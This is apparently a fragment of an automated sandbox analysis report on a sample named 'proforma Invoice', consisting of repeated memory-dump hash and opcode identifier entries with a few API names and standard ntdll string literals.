                                                                          • Instruction ID: db947739063647c9744d496cf41d62a9638e4fbc5a7ce2f6c21d8977704848eb
                                                                          • Opcode Fuzzy Hash: fe356ddab4b668e71d4d5650872301272705ad6a8fc6267ba5f8a0d71ce9bc32
                                                                          • Instruction Fuzzy Hash: 5FF0F933741611B7C739DB568C40F87BEADEB84B90F014429A60597600CB30DD01C7A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction ID: a99a5584cc23619578a7975918fa47b457464733ef60a6ce663d80d8f35ecea2
                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction Fuzzy Hash: 71F0C2B6600615ABD328DF4DDC40F57FBEEDBD1A84F048528A645C7320EA31DD05CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction ID: d09ab0ec65697632ae1df161e8c28370558c29316fcc5cf85405b74a5fa4cdd2
                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction Fuzzy Hash: 99F0F233108733DBD7FE1F594440B6BA69D8FE1A54F160035EA2557201CBA18D0197D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction ID: 52d76b38fba3f8fce0582be6726d144e5e2c20da0a5f71f336b786d07d5ea20c
                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction Fuzzy Hash: 8C01F4322046859BD72E975DC809F99BBE8EF41764F0940A9FA548B7A1E778C800C252
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b1393ba567efaf1387bf6204ec26468ea2d939272f2fec8ab4b474a53f1aaa5
                                                                          • Instruction ID: 3bc51c79853835e1b3c7c03db7f4078b09085909e5ae1b96d5f6f89a49753626
                                                                          • Opcode Fuzzy Hash: 7b1393ba567efaf1387bf6204ec26468ea2d939272f2fec8ab4b474a53f1aaa5
                                                                          • Instruction Fuzzy Hash: A4018F71A10249ABCB04DFA9D445AEEBBF8BF58314F14005AE500A7380D774EA01CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                          • Instruction ID: f80ae8df5ea8450468e94c7f4b64784463a4b96bc2122b1fa59eb9e610f8bb79
                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                          • Instruction Fuzzy Hash: E4F01D7220001DBFEF059F94DD80DEF7BBEEB59298B104125FA1192160D731DE21EBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ab0d6c6d5becf9057ed83b442a39635ac030de655b23adc2c3ee00c8f1b3e44
                                                                          • Instruction ID: fcbf8911271fa26f952b63adb705d808a7d738661350d52a5a3e6559a064380c
                                                                          • Opcode Fuzzy Hash: 9ab0d6c6d5becf9057ed83b442a39635ac030de655b23adc2c3ee00c8f1b3e44
                                                                          • Instruction Fuzzy Hash: 9D018536110619ABCF129E94E848EDA3FA6FF4C664F068105FE1866220C332D970EB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 829d41f1655fe56e01fb75dedccec74171df7b83b463c2e49137b91fc5c6667f
                                                                          • Instruction ID: d3564d023a9b2246a5f36793897fd9f3509681e53ba0ad85725fabbb73a77ede
                                                                          • Opcode Fuzzy Hash: 829d41f1655fe56e01fb75dedccec74171df7b83b463c2e49137b91fc5c6667f
                                                                          • Instruction Fuzzy Hash: 2FF024B2304341DBF79C9A198D81B22329EE7D0691F25806AEF158B2C1EB71DC01C3D5
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 618f41f29c1173c0c009a119b7507ff45ffe42d31170cd32a9db25e1d10cabcf
                                                                          • Instruction ID: 0494b89c0cbe4b7931c7c09719029ad6bbbf0a61ae5857628c5398024dbfa3b1
                                                                          • Opcode Fuzzy Hash: 618f41f29c1173c0c009a119b7507ff45ffe42d31170cd32a9db25e1d10cabcf
                                                                          • Instruction Fuzzy Hash: 6801A471205B819BF72E9B6CCD4CB2937B4BB40B44F490190FA118BED6DB78D401C622
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction ID: 91d37473d6e925d296af04170878946651647e6ede17a91695ec19ce4eca2950
                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction Fuzzy Hash: 1FF0E935361D9347EB7BBB2D9410B2AB7A69F90900B25A72C9711CB6C1DF60D8418780
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction ID: 9a4e130e7cbb42446c58c80c329d17bbc7090f8567aeefefe5241010be2a49e6
                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction Fuzzy Hash: B0F0E9337129119BE3398ACDCC84F12B7F8EFD5A60F1A0025A6049B260C360EC02C7D0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3e3042b4c41c0d40a00aa40a7825442342392175c3d8c456fd0e2a61f5b6021
                                                                          • Instruction ID: 35e2265eaa8be3e0f17bb89e4d01c94f82fd1b651e5c4935d08569c546648c47
                                                                          • Opcode Fuzzy Hash: a3e3042b4c41c0d40a00aa40a7825442342392175c3d8c456fd0e2a61f5b6021
                                                                          • Instruction Fuzzy Hash: 74F0AF706197049FC318EF68C945E1EBBE4FF98714F80465AB898DB394E734EA00CB96
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction ID: a6aba8cabc33f6ddc39ca543eab6a8294490b45e0e87b338e1ffbf56d79d0e65
                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction Fuzzy Hash: 96F0F072A00204AEE718DB21CC00F86B6EDEF9C304F148468A944CB260EBB0DD40C754
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 286fc08457f4bd85766bdc91cd77d0ca42ed08b459c185d65b25be4b969e1f9f
                                                                          • Instruction ID: 0936cf07ebb874e748ee78a71966c68d3e3b51c3c401c9273842fe448e93a5da
                                                                          • Opcode Fuzzy Hash: 286fc08457f4bd85766bdc91cd77d0ca42ed08b459c185d65b25be4b969e1f9f
                                                                          • Instruction Fuzzy Hash: 5FF0B432510644ABD7296A5CE8CCB5EBB9DFB94754F094415FD49671218772BC80C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: e5ebf813c84f7c7aab0adabeea03784e3c6488239a47497316881225d7f789d3
                                                                          • Instruction ID: 3aed9e4a3d4283bf07664b961f87416249a1c366915f81847533d3248112729a
                                                                          • Opcode Fuzzy Hash: e5ebf813c84f7c7aab0adabeea03784e3c6488239a47497316881225d7f789d3
                                                                          • Instruction Fuzzy Hash: 23E0D8321006549BC325FF29DD41F8B7BAEEF64368F014515F11557590CB35AD10C7D4
                                                                          • Instruction ID: 9ddb19dcddf1c5cfd1eaa2946c5e532462c50a6f4f842d69fbeafebc1987006b
                                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                          • Instruction Fuzzy Hash: 78C01232150644AFD7159A95CD01F0177A9E798B40F000021F20447670C631E911E644
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction ID: 1a28381dc1c6fd6a003594a5d89b36278a0ffb5270bb5e027fd47eb9f29443fc
                                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                          • Instruction Fuzzy Hash: DCD0123610024CEFCB06EF41D890D9A772AFBD8710F108019FD19077108A31ED62DA50
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction ID: 3b36b5405bcfa155083d23a523bb5c29083d4657a7ec304bd30cc06c60ce8184
                                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                          • Instruction Fuzzy Hash: A1C04879712A428FCF1ADB2AD2D4F8977F4FB44754F150890E809CBB22E724E801DA11
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                          • Instruction ID: a083a994949ac9c69469ba7ef491b3f436932e4e643d46c85e30d049bea52195
                                                                          • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                          • Instruction Fuzzy Hash: B7B01232212545CFC7137720CB00B1832EABF017D0F0940F0650089830D7288910EA01
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e8673e44f2489aafd7f3bef25876e0f02721f69142f1fc874e9a1604e4e2e24
                                                                          • Instruction ID: 45b63d528364833390940baae2b97943331d4feb0afb804ab8f31e5005814ba6
                                                                          • Opcode Fuzzy Hash: 5e8673e44f2489aafd7f3bef25876e0f02721f69142f1fc874e9a1604e4e2e24
                                                                          • Instruction Fuzzy Hash: 5190022120184442D14472684D44B4F410997E1602F95C019E4157554CCA1589555B21
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cff01d605189e84b89c12c76498b0c43ba8447685a5c28758802ed10dc3d927d
                                                                          • Instruction ID: 5add0a325c0f34cdc89a99db142efee59e6944c74197383879d6c074a9925b2a
                                                                          • Opcode Fuzzy Hash: cff01d605189e84b89c12c76498b0c43ba8447685a5c28758802ed10dc3d927d
                                                                          • Instruction Fuzzy Hash: 8890022124140802D14471688954747000AD7D0A01F55C011E0026554DC7168A656BB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 27a60d0374c99d19cfcb97ae80bf7f154466ea8db0c7ad55891a03a5e1df42e8
                                                                          • Instruction ID: 5aa210cc54ad032e794b9de46b773a12ce9092778e133c6a46101c2a13db1442
                                                                          • Opcode Fuzzy Hash: 27a60d0374c99d19cfcb97ae80bf7f154466ea8db0c7ad55891a03a5e1df42e8
                                                                          • Instruction Fuzzy Hash: D890023160580012914471684DC45864009A7E0701B55C011E0426554CCB148A565761
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8a96f56ca446d7b0cf041f367979666c6a9b22d18ebd89885c831b1c0b569ad
                                                                          • Instruction ID: bf2d63b6233268dcc41d3e42c7890cfe4571af41cd1a47bd799653759a04ae4a
                                                                          • Opcode Fuzzy Hash: b8a96f56ca446d7b0cf041f367979666c6a9b22d18ebd89885c831b1c0b569ad
                                                                          • Instruction Fuzzy Hash: AE90026160150042414471684D444466009A7E1701395C115E0556560CC71889559769
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bb624544fb45e6580931ddfa3db554668807ef7b263a0dae8eac9b823d5ff75b
                                                                          • Instruction ID: 4f10fd0600ca46b12933de82fd898e94e6f8dc943ce48cba679399d3ab3d0314
                                                                          • Opcode Fuzzy Hash: bb624544fb45e6580931ddfa3db554668807ef7b263a0dae8eac9b823d5ff75b
                                                                          • Instruction Fuzzy Hash: 8A90023120140802D10871684D446C6000997D0701F55C011E6026655ED76589917631
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bed18271977b68032d85e361686a643ef6a4b05ed824cddd19ed6aca4a99cfd9
                                                                          • Instruction ID: 24f763943418d3864546490fe7509ca6314eafb4bc1b3d51551f0ce10488e3d5
                                                                          • Opcode Fuzzy Hash: bed18271977b68032d85e361686a643ef6a4b05ed824cddd19ed6aca4a99cfd9
                                                                          • Instruction Fuzzy Hash: 6F90023160540802D15471684954786000997D0701F55C011E0026654DC7558B557BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3dbc279f5713aa9298c1c926dc8847e3689b978eb20836730fd9c0df399d34d4
                                                                          • Instruction ID: 6c80909dfb8278cab3e40a04e16b06e7527b73cfe84a974e7fe3e851eb69584e
                                                                          • Opcode Fuzzy Hash: 3dbc279f5713aa9298c1c926dc8847e3689b978eb20836730fd9c0df399d34d4
                                                                          • Instruction Fuzzy Hash: F290023120140802D1847168494468A000997D1701F95C015E0027654DCB158B597BA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8206d0b84bd908d070896b8a7b7c5157d32c0edaa8daeb171e014f749a700ad1
                                                                          • Instruction ID: a6801604ad9b15a58308761e9ec3c132753a4e881f9f9dcbb2c926083d3f64d8
                                                                          • Opcode Fuzzy Hash: 8206d0b84bd908d070896b8a7b7c5157d32c0edaa8daeb171e014f749a700ad1
                                                                          • Instruction Fuzzy Hash: 5990023120544842D14471684944A86001997D0705F55C011E0066694DD7258E55BB61
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aec0e875bdce80d586e1215d35f75aad970cf0c887fc7bcb1f9adb7eb42a05f9
                                                                          • Instruction ID: 83f7b2ac6ae84a7e9414d2c15ee99bfbf3b2e02bb7d3b66260e8aed7392cbdd0
                                                                          • Opcode Fuzzy Hash: aec0e875bdce80d586e1215d35f75aad970cf0c887fc7bcb1f9adb7eb42a05f9
                                                                          • Instruction Fuzzy Hash: 599002A1201540924504B2688944B4A450997E0601B55C016E1056560CC62589519635
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1cb7119231e15ba47938f96b5fc493abbd240a68a9def0e367ccfc9d1218f388
                                                                          • Instruction ID: 1088a5e499f384d6f7d5ea8a513142f467944e9ff0489b764b3a56721f3356e6
                                                                          • Opcode Fuzzy Hash: 1cb7119231e15ba47938f96b5fc493abbd240a68a9def0e367ccfc9d1218f388
                                                                          • Instruction Fuzzy Hash: 9390043531140003010DF57C0F44547004FD7D5751355C031F1017550CD731CD715731
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8ddaed3d2ea1035834a567a59f793f7a7ec0b7dc91fdca33f4ac97ada8b70ce
                                                                          • Instruction ID: 6a6b2567a9f6057329075a242627e99716845789c89734c5950eadbd87af9756
                                                                          • Opcode Fuzzy Hash: d8ddaed3d2ea1035834a567a59f793f7a7ec0b7dc91fdca33f4ac97ada8b70ce
                                                                          • Instruction Fuzzy Hash: F1900225221400020149B5680B4454B0449A7D6751395C015F1417590CC72189655721
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b743c2392ab886a50f32641b4a35e93aaba396d0fddc19006b1d346aec40f942
                                                                          • Instruction ID: 298b3ec7a5b3f6bac600ff0dc2cc2d986921d30f1b560d1215716025035f38a9
                                                                          • Opcode Fuzzy Hash: b743c2392ab886a50f32641b4a35e93aaba396d0fddc19006b1d346aec40f942
                                                                          • Instruction Fuzzy Hash: AF90022921340002D1847168594864A000997D1602F95D415E0017558CCA1589695721
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e4613165bb851676eba4cb8fd3490fad53f09b08e3d003b85209a31d1c6a46a
                                                                          • Instruction ID: 9acf6e9eb7ca5fa3c2540eb62a5f16adfcd8f198b2e324f0af3c0d3e2d918dc3
                                                                          • Opcode Fuzzy Hash: 0e4613165bb851676eba4cb8fd3490fad53f09b08e3d003b85209a31d1c6a46a
                                                                          • Instruction Fuzzy Hash: 0C90022120544442D10475685948A46000997D0605F55D011E1066595DC7358951A631
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4dc6d85a8e9701ef26f54a2797b881323ac318adc6a5d8148ee7d57ecdc66e1b
                                                                          • Instruction ID: b939a01ccd872413a08bae12cfde35214fa2d18dc431f9d7951940c0a457241f
                                                                          • Opcode Fuzzy Hash: 4dc6d85a8e9701ef26f54a2797b881323ac318adc6a5d8148ee7d57ecdc66e1b
                                                                          • Instruction Fuzzy Hash: 0390022130140003D144716859586464009E7E1701F55D011E0416554CDA1589565722
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 90cda5a0bfd795fd85387539ef41720cedb6bb4bc6f448e9563b173bd3293550
                                                                          • Instruction ID: 3c4f978b281baa844ccc47fbe15670295e4abad7ca751038f46eea795b50162c
                                                                          • Opcode Fuzzy Hash: 90cda5a0bfd795fd85387539ef41720cedb6bb4bc6f448e9563b173bd3293550
                                                                          • Instruction Fuzzy Hash: F990023124140402D14571684944646000DA7D0641F95C012E0426554EC7558B56AF61
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          Strings
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011D4725
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 011D4787
                                                                          • Execute=1, xrefs: 011D4713
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011D4655
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011D4742
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011D46FC
                                                                          • ExecuteOptions, xrefs: 011D46A0
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __aulldvrm
